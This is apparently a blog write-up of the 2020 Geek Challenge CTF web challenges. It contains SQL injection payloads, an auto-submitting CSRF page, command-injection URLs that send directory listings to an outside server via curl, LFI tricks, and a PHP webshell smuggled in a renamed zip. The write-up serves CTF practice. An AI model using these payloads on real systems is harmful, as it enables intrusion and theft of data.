2020极客大挑战web部分复现

最新推荐文章于 2023-05-31 20:04:39 发布
最新推荐文章于 2023-05-31 20:04:39 发布
阅读量6.8k 收藏 7
点赞数
分类专栏: web CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45055269/article/details/110292117
版权
CTF 同时被 2 个专栏收录
31 篇文章 6 订阅
订阅专栏
web
4 篇文章 0 订阅
订阅专栏

WEB

0x01.朋友的学妹

找回感觉了,仿佛大一的第一道web题,哭唧唧,工作室里没人陪我,一个人复现。ctrl+U查看源码,找到注释的flag,页面提示base64解密,解密即得flag
SYC{F1@_4s_h4Lpfullllll}

0x02.EZwww

备份是个好习惯,http://47.100.46.169:3901//www.zip,下载到备份文件,flag.txt是个假的flag,查看index.php可见
在这里插入图片描述
利用hackbar以post方式传入参数
2
SYC{Backup_1s_4_good_h4bit_l0l}

0x03.刘壮的黑页

考察请求方式
在这里插入图片描述
SYC{d0_y0u_k0nw_GET?}

0x04.Welcome

访问界面,直接报了405的错
1
百度发现是访问本页面的HTTP方法不被允许,换种请求方式,在postman里用post请求本网址,返回内容

<?php
error_reporting(0);
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
header("HTTP/1.1 405 Method Not Allowed");
exit();
} else {
    
    if (!isset($_POST['roam1']) || !isset($_POST['roam2'])){
        show_source(__FILE__);
    }
    else if ($_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'])){
        phpinfo();  // collect information from phpinfo!
    }
}

传入roam1和roam2变量相等但是哈希值不一样,emmm,传入数组,因为各种哈希都无法对数组进行操作,会返回False。然后又因为False === False => True,所以顺利绕过。返回phpinfo界面在里面找到
2
众所周知,一般的Apache和nginx的根目录是
/var/www/html,所以只要访问http://49.234.224.119:8000/f1444aagggg.php即可。
1
当场哭唧唧,但是访问其他不存在的路径时,下面会出现版本号,所以这个页面是出题人故意写的。
结合hint2:Try to use burpsuite to do this challenge,在返回头中找到flag
1
SYC{w31c0m3_t0_5yc_r0@m_php1}

0x05.EZgit

当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,嘿嘿嘿。。。
先访问一下http://47.100.46.169:3902/.git/
git泄露好的,git源码泄露,上GitHacker
安装参考文章安装GitHacker
这里有个小坑,直接下载GitHacker.py,无法使用
在生成的47.100.46.169_3902里找到fl4g.php,但是提示flag is toooo old!
结合题目提示,版本信息更改了,使用 git log -p查看git日志,即可在日志里找到flag
图片

SYC{I_10ve_syc10ver_101}

0x06.我是大黑客

提示种下了木马,在界面上提示有一个备份文件1
直接访问目录把文件下载下来
2
发现是一句话木马,中国蚁剑连一下,根目录下发现flag
2
SYC{1iuzHuang_yyd_G0d!}、

0x07.ezbypass

你相信这世界上有黑魔法吗?是一些黑魔法函数
打开链接,要求上传a和b两个变量

  • a和b的strcmp结果要为NULL
  • a和b不能相等
    利用数组绕过
    绕过后又要求传入一个c要等于123但是又不是数字,那就传入一个123qwe,123后面加一些字母/字符就行
    1
    SYC{php_4s_so_funny}

0x08.带恶人六撞

你想了解带恶人六撞吗,数据库里有大家关于他的描述。
提示到数据库了,就考虑注入吧
sqlmap可以跑
1
SYC{liuzhuang_4s_@_G00d_m@n}
手工注入

?id=1'
返回:You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
#判断存在sql注入

报错注入

先尝试
?id=1 and (updatexml(1,concat(0x7e,(select database()),0x7e),1))
返回:hacker?

接着尝试别的报错函数
?id=1'^extractvalue(1,concat(0x7e,(select(database()))))%23
返回:XPATH syntax error: '~geek_sql'

然后查看表名
?id=1'^extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='geek_sql')))%23
返回:XPATH syntax error: '~blog,fllllag'

查看列名
?id=1'^extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='fllllag')))%23
返回:XPATH syntax error: '~id,fllllllag'

查看fllllag表中的fllllllag列
?id=1'^extractvalue(1,concat(0x7e,(select group_concat(fllllllag) from fllllag)))%23
返回
XPATH syntax error: '~welcome_to_syclover,longlone_ne'
 
好像没有回显全部内容,应该是extractvalue函数存在回显长度,配合limit回显每一行的内容
?id=1'^extractvalue(1,concat(0x7e,(select fllllllag from fllllag limit 2,1)))%23
返回
XPATH syntax error: '~SYC{liuzhuang_4s_@_G00d_m@n}'

0x09.flagshop

听名字是卖flag的,哈哈哈,csrf跨站脚本伪造,在管理员的登录态收到你传入的指令去执行只有管理员有权限的操作,听着好绕。
打开界面是个登陆界面,hint里提示不要去构造admin登录,那我就自己注册一个账号,登陆上去
1
登陆上界面后发现需要很多钱购买flag,然而自己只有11元,翻了翻界面只发现转账和报告界面,转账界面发现可以给别人转钱,自己这么穷还给别人转钱吗,沉默,自己给自己转钱也被ban掉,后来在主页发现财富榜,财富榜就很可疑,你这么有钱可不可以转给我一些,白嫖精神上线。
财富榜1是Longlone,结合在报告里看到的他会看每个回复也就是他会点击我们的回复,于是我们可以伪造出向我转钱的请求,在Longlone的登录态下被点击,钱钱不就到手了吗1
利用burpsuit生成csrf的攻击html
1
抓到请求后,右键生成csrf的poc,但是想让poc自动提交,还有加上一点scripts
1
复制下来加上一点javascripts内容

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://173.82.206.142:8005/transfer.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="target" value="re1wn" />
      <input type="hidden" name="money" value="100000000000000000000000000000" />
      <input type="hidden" name="messages" value="nihao" />
      <input type="submit" value="Submit request" id="click"/>
    </form>
    <script type="text/javascript">
      document.getElementById("click").click();
    </script>
  </body>
</html>

      <input type="submit" value="Submit request" id="click"/>
    </form>
    <script type="text/javascript">
      document.getElementById("click").click();
    </script>

这小部分的配合达到自动提交请求的功能,将文件放到html,放到云服务器上,得到一个链接。
然后提交报告,提交报告涉及到md5的爆破

#-*- coding: utf-8 -*-
#!/usr/bin/env/python
from multiprocessing.dummy import Pool as tp
import hashlib

knownMd5 = '06cf6'      #已知的md5明文
def md5(text):
    return hashlib.md5(str(text).encode('utf-8')).hexdigest()

def findCode(code):
    key = code.split(':')
    start = int(key[0])
    end = int(key[1])
    for code in range(start, end):
        if md5(code)[0:5] == knownMd5:
            print(code)
            break
list=[]
for i in range(3):    #这里的range(number)指爆破出多少结果停止
    list.append(str(10000000*i) + ':' + str(10000000*(i+1)))
pool = tp()    #使用多线程加快爆破速度
pool.map(findCode, list)
pool.close()
pool.join()

提交上去不一会,钱钱到账。
SYC{cross_s1t3_r3q43st_4orgery_1s_44nny}

0x0A.知X堂的php教程

非预期解:
nginx服务器查看日志的payload
?phpfile=…/…/…/…/var/log/nginx/access.log
查看日志得到某师傅的payload,直接读取flag
常规解法:发现可以列文件listdir.php,读文件displaySourceCode.php,尝试读listdir.php。

<!DOCTYPE html>
<html>
<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8" />
  <title>教案</title>
</head>
<body>

<?php
include("waf.php");

// 设置目录名称并进行扫描。
$search_dir = $_GET['dirname'];
$title = "教案";

// 防止命令注入
$search_dir = shellWaf($search_dir);

//$contents = scandir($search_dir); 或者使用
exec("ls $search_dir", $contents);

print "<h1>$title</h1><hr/><br/>";

// 列出文件。
foreach ($contents as $item) {
	if ( is_file($search_dir . '/' . $item) AND substr($item, 0, 1) != '.' ) {

	// 打印信息。
	print "<a href=\"displaySourceCode.php?phpfile=$search_dir/$item\">$item</a><br/>";
	}
}
?>

</body>
</html>

关键是exec里的$search_dir可以构造,但是waf.php里过滤了一些字符,读一下waf.php

<?php

// 防御XSS
function html($string) {
	return htmlspecialchars($string);
}

// 防御命令注入
function shellWaf($string) {
	return preg_replace("/(&)|(\|)|(>)|(<)/i", "", $string);
}

preg_replace正则表达式的匹配只过滤了& | > <,存在RCE
由于没有回显,故vps上nc接受信息
这里考虑过flag在哪里,不在根目录下,listdir.php里的is_file只显示文件,但是没有显示flag文件,所以推测flag在根目录的文件夹里。
先构造payload

http://47.94.239.194:8082/listdir.php?dirname=/;curl%20120.53.226.203:1234?hello=`ls%20/`

只回显了bin说明成功了,但是信息被空格或回车截断了
1
用base64加密绕过,考虑到|被禁用,所以先base64加密再base64解密绕过。

http://47.94.239.194:8082/listdir.php?dirname=/;php -r 'system(base64_decode("Y3VybCAxMjAuNTMuMjI2LjIwMzoxMjM0P2hlbGxvPWBscyAvfGJhc2U2NGA="));'

1
base64解密
1
访问文件夹

http://47.94.239.194:8082/listdir.php?dirname=/;php -r 'system(base64_decode("Y3VybCAxMjAuNTMuMjI2LjIwMzoxMjM0P2hlbGxvPWBscyAvZmxhZ2dnZ2dnZ2dnZ2dnZ2dfMXNfaGVyZS8qfGJhc2U2NGA="));'

1
2
直接读取文件

http://47.94.239.194:8082/displaySourceCode.php?phpfile=../../../../../flagggggggggggggg_1s_here/flag

在这里插入图片描述
SYC{Mak3_ZXT_sh*t_4oreVer}

0x0B.Myblog

文件包含LFI漏洞
情景:
(1) http://vulnerable/fileincl/example1.php?page=intro.php(该php文件包含LFI漏洞)
(2) 但是你没有地方可以upload你的webshell代码
(3) LFI只能读取到非php文件的源码(因为无法解析执行 只能被爆菊花)
(4) 如果你能读取到config.php之类文件 或许可以直接拿到数据库账号远程入侵进去

利用page=php://filter/read=convert.base64-encode/resource=
payload

http://120.27.146.26:8002/index.php?page=php://filter/read=convert.base64-encode/resource=login

login不加php,是因为http://120.27.146.26:8002/index.php?page=home
home没加php
查看login.php,表单提交部分为重要代码

<form method="post" action="/?page=admin/user" class="form-validate" id="loginFrom">

表单提交到admin/user
查看admin/user
payload

http://120.27.146.26:8002/index.php?page=php://filter/read=convert.base64-encode/resource=admin/user

<?php
error_reporting(0);
session_start();
$logined = false;
if (isset($_POST['username']) and isset($_POST['password'])){
	if ($_POST['username'] === "Longlone" and $_POST['password'] == $_SESSION['password']){  // No one knows my password, including myself
		$logined = true;
		$_SESSION['status'] = $logined;
	}
}
if ($logined === false && !isset($_SESSION['status']) || $_SESSION['status'] !== true){
    echo "<script>alert('username or password not correct!');window.location.href='index.php?page=login';</script>";
	die();
}
?>

用户名Longlone,密码为弱比较,password传空,cookie值清除,成功登录。
登录之后发现上传,同时在上面的admin/user里看到上传的php代码。采用白名单检测。

	  <?php
		if(isset($_FILES['Files']) and $_SESSION['status'] === true){
			$tmp_file = $_FILES['Files']['name'];
			$tmp_path = $_FILES['Files']['tmp_name'];
			if(($extension = pathinfo($tmp_file)['extension']) != ""){
				$allows = array('gif','jpeg','jpg','png');
				if(in_array($extension,$allows,true) and in_array($_FILES['Files']['type'],array_map(function($ext){return 'image/'.$ext;},$allows),true)){
						$upload_name = sha1(md5(uniqid(microtime(true), true))).'.'.$extension;
						move_uploaded_file($tmp_path,"assets/img/upload/".$upload_name);
						echo "<script>alert('Update image -> assets/img/upload/${upload_name}') </script>";
				} else {
					echo "<script>alert('Update illegal! Only allows like \'gif\', \'jpeg\', \'jpg\', \'png\' ') </script>";
				}
			}
		}
	  ?>

利用压缩包白名单绕过,传马

在一个php文件里写一句话木马

<?
eval($_POST(['cmd']);
?>

保存为1.php
添加到压缩文件,生成一个.zip
改.zip压缩包为.jpg后缀
上传文件
成功上传

利用zip伪协议执行一下

zip:// + zip路径 + %23 + php文件名
http://120.27.146.26:8002/?page=zip://assets/img/upload/fda4774a737ed5d17103d8cb28ef0055d3c82bd6.jpg%231
#这里不加.php后缀是因为在index.php包含的时候默认加上了

payload

http://120.27.146.26:8002/?page=zip://assets/img/upload/fda4774a737ed5d17103d8cb28ef0055d3c82bd6.jpg%231

蚁剑直接连上,在根目录下看到flag。1
SYC{php_15_635t_1@n94a93_1n_th3_w0r1d!}

0x0C.忏悔的刘壮

给了个输入框,让输入答案,一开始没反应过来,后来发现答案在cookie里,好像之前利用cookie作验证码效果差不对,写一个脚本

import requests
import time

req = requests.session()
req.get('http://120.79.197.4:5000/')
while True:
    #print(str(req.cookies))
    print(str(req.cookies)[34])  #34是数出来的,233
    ans = str(req.cookies)[34]
    #print(ans)
    data={'answer':ans}
    time.sleep(0.1)
    l = req.post(url = 'http://120.79.197.4:5000/check',data=data)
    #print(l.text)
    if "SYC" in l.text:
        print(l.text)
        break
    time.sleep(0.1)
    req.get('http://120.79.197.4:5000/do_answer')

SYC{this_is_your_flag}

北风~
关注
专栏目录
NSSCTF-极客挑战2020-web-wp
F1rstb100d
09-21 645
NSSCTF-极客挑战2020-web-wp
【misc】2021 极客挑战部分
woodwhale的博客
11-29 4390
【misc】2021 极客挑战部分) 1、今天有被破防吗? 0x1 最早上的一批题目,当时没什么思路。后来pwn神在群里提到了RGB,瞬间懂了! 参考链接: gaps拼图 0x2 下载附件得到一个很长的txt文本,其中每一行都是三个数字。如果知道是RGB就好处理了。 0x3 注意到一共1166400行,那么就是1080*1080的规格 简单的python脚本处理一下图片 from PIL import Image res = [] with open("./ans.txt","r") as f
[原题复现][极客挑战 2019]HardSQL(update报错注入)
笑花大王
02-15 2964
简介 原题复现: 考察知识点:SQL注入(报错注入,绕过过滤) 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台 特别感谢!) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 复现 经过手工测试过滤了and、= 空格 union等多个sql关键字 要思考如何绕过这些关键字去注入! 使用updatexml报错法注入 查数据库信息 http://1bfb...
2020极客挑战web部分wp
qidiandexiaowu
11-17 629
可能起点不同吧,对于萌新(我)来说确实是难了点。 web1 welcome 进去是个空白页面,以post方式提交数据,就会看到 <?php error_reporting(0); if ($_SERVER['REQUEST_METHOD'] !== 'POST') { header("HTTP/1.1 405 Method Not Allowed"); exit(); } else { if (!isset($_POST['roam1']) || !isset($_POST['ro
极客挑战2020_极客挑战颁奖典礼
weixin_39665762的博客
12-15 314
2020年12月1日晚,网络空间安全学院三叶草信息安全小组“极客挑战”颁奖典礼在4213教室成功举行。网络空间安全学院党委副书记林细俤、三叶草安全技术小组指导老师吴春旺莅临此次颁奖典礼。 首先,林细俤上台致辞,他对此次极客挑战的举办给予了充分的肯定,并赞扬了三叶草小组对此次活动的组织带头作用。随后,他对获得名次和奖励的队伍和个人进行了肯定和鼓励,希望他们能够再接再...
2020极客挑战】来拼图
_Kisaragi_的博客
11-03 372
题目描述 将文件下载下来,打开一看,题目给了一张原图: 以及一个装着图片碎片的文件夹,可以看到一些图片上已经有flag的字样了: 看看有多少图片,结果1600张,这也太碎了orz: 那应该就是40×40的切割处理了。 通过观察文件名,好像还挺有规律的,那拿这张图片的文件名来看看,毕竟是flag的开头: 通过尝试不同的解密方式,最终确定这是MD5加密,内容为144: 所以这应该是图片的编号? 那我试试145的MD5: 拿去找找看,结果空空的,啥都没有: 不过
[极客挑战 2019] web题-LoveSQL
BROTHERYY的博客
07-07 300
复现环境:buuoj.cn 打开环境是一个登录框 sql注入,寻找闭合方式 登录成功,以为到这里就结束了,结果没这么简单,继续注入 tips:在url中输入的,所以不能用#,要用url编码%23 得到数据库名字 得到geek库里所有的表 继续注入得到字段名 dump出数据,结果这里发现geekuser里面没有数据,返回注入l0ve1ysq1这个表 flag{e503ad68-34dc-4b23-a315-046762d91322} 太长了截图不能截全,拉一下滑动条。 ...
[极客挑战 2019] web题-HardSQL
BROTHERYY的博客
07-13 370
复现环境:buuoj.cn union被过滤了 ,会被他抓住,使用updatexml 得到表名 得到字段查询username和password 查询密码发现不能显示完全 使用left和right进行查询 left=flag{2b77bf01-867e-4b28-a801-0 right=4-be1d-4be4-bc1b-24069dfe9222} 拼凑得到flag flag{2b77bf01-867e-4b28-a801-04-be1d-4be4-bc1b-24069dfe9222} ...
[buuoj]极客挑战 2019]PHP 1
qq_42250840的博客
06-28 1306
知识点: 1、直接扫描目录得到网站源码 2、public、protected与private在序列化时的区别 3、__wakeup()方法绕过 复现: 首先根据提示网站备份文件,考虑扫描备份文件 首先我们需要一个网站备份文件的爆破字典 可以用脚本实现: import sys import imp imp.reload(sys) import os import os.path import requests from urllib.parse import unquote suffixList = ['.
[buuoj][极客挑战 2019]Secret File
qq_42250840的博客
06-26 241
考点: 文件包含漏洞,PHP伪协议获取文件 复现: 老规矩,点开页面,查看源码 找到信息页面,点击打开 反手一波源码 啥都没有,考虑页面停留时间太短 用burp抓包 得到一个secr3t.php 访问它 访问flag.php 反手查看源码,啥都没有… 想到前面的那段php代码,考虑是文件包含漏洞 用php://fileter来获取文件 得到base64源码 解码得到flag 总结: 利用文件包含漏洞与php伪协议结合 ...
2020第十一届极客挑战——Geek Challenge部分wp
monster663的博客
10-26 4033
比赛正在进行中,本来只剩web没有AK,然后出了一波新题,先留一个坑,之后再填
web-[极客挑战 2019]Http
wojiushilsy的博客
04-30 385
题目要点题目内容解题 题目要点 User-Agent Referer:Referer :请求头包含了当前请求页面的来源页面的地址,即表示当前页面是通过此来源页面里的链接进入的。 X-Forwarded-For:可以被用来获取最初发起请求的客户端的IP地址 题目内容 解题 F12查看源码,发现一个页面。 查看页面。 添加Referer请求头:Referer:https://www.Syc...
[极客挑战 2020]Greatphp (php 内置类)
qq_62046696的博客
12-20 1305
闭合掉,因为前面可能会有一些报错的信息,所以可以先闭合掉前面的东西,然后再来包含后面的是取反,因为在链里面所以需要用到解码,不用编码绕不过去正则,里面是/flag因为刷题多了都在根目录下面,不在的话正能一步步尝试。这里本来是用Exception构造,可是报错,因为我的php版本是5.41的然后没有Error,正在我想为什么报错的时候突然想到了,因为php7版本才引入PHP7中,可以在echo时触发__toString所以换了一个版本。PHP7中,可以在echo时触发__toString,来构造XSS。
BUUCTF--[极客挑战 2020]Greatphp
qq_46263951的博客
08-11 1232
进入页面后可以看到给出的代码 <?php error_reporting(0); class SYCLOVER { public $syc; public $lover; public function __wakeup(){ if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($th
[极客挑战 2020]Greatphp
shinygod的博客
04-04 968
知识点:Error原生类的利用 <?php error_reporting(0); class SYCLOVER { public $syc; public $lover; public function __wakeup(){ //反序列化的时候自动调用 if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) &a
php内置类小结
leekos的博客,分享web安全相关知识~
05-31 1374
PHP 的内置类 SoapClient 是一个专门用来访问web服务的类,可以提供一个基于SOAP协议访问Web服务的 PHP 客户端。Error类是php的一个内置类,通常用于自定义一个Error,在php7版本后适用,可能存在xss漏洞,因为内置了一个。类也是可以遍历一个文件目录,使用方法与前两个类也基本相似。看了一下文档发现该原生类是继承FilesystemIterator的,所以也是以绝对路径显示的。(需要注意的是,我们使用GlobIterator只需要输入路径即可,不需要添加glob://)
极客挑战php,buucitf-[极客挑战 2020]Roamphp1-Welcome
weixin_36280317的博客
03-22 198
打开靶机,发现什么也没有,因为极客挑战有hint.txt,里面说尝试换一种请求的方式,bp抓包,然后发送了POST请求,出现了下面的界面这个还是挺简单的,因为是极客挑战上的第一波题,关键是这个如果不是用POST请求,就会出现类似报错的信息。紧接着就是isset这个很好绕过,我们要传参,这个肯定到了else if判断,如果进入这个循环,我们就可以拿到这个站的phpinfo()信息,POST传两个...
[SCTF2019]Flag Shop (RUBY模板注入)
qq_62046696的博客
12-16 711
直接修改会报错,所以我们现在需要密钥secret,到这里没什么提示了,dirsearch扫一下发现了robots.txt,首先想了一下如果做一个脚本一直点击work不就好了吗,但是又想了一下服务器响应太快也不行,如果设置sleep那时间太长了。SECRET不为空所以需要传入一个值,这个预定义字符的作用是将匹配之后的字符进行返回。发现了很长的一段代码,呃呃呃没见过的样子,百度发现是Ruby的语法。发现了里面三段中间用.链接,妥妥的jwt形式,然后换一个思路,burp抓包看了一下,改完之后发现还是不对。
buuctf web 极客挑战2019
最新发布
08-24
对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值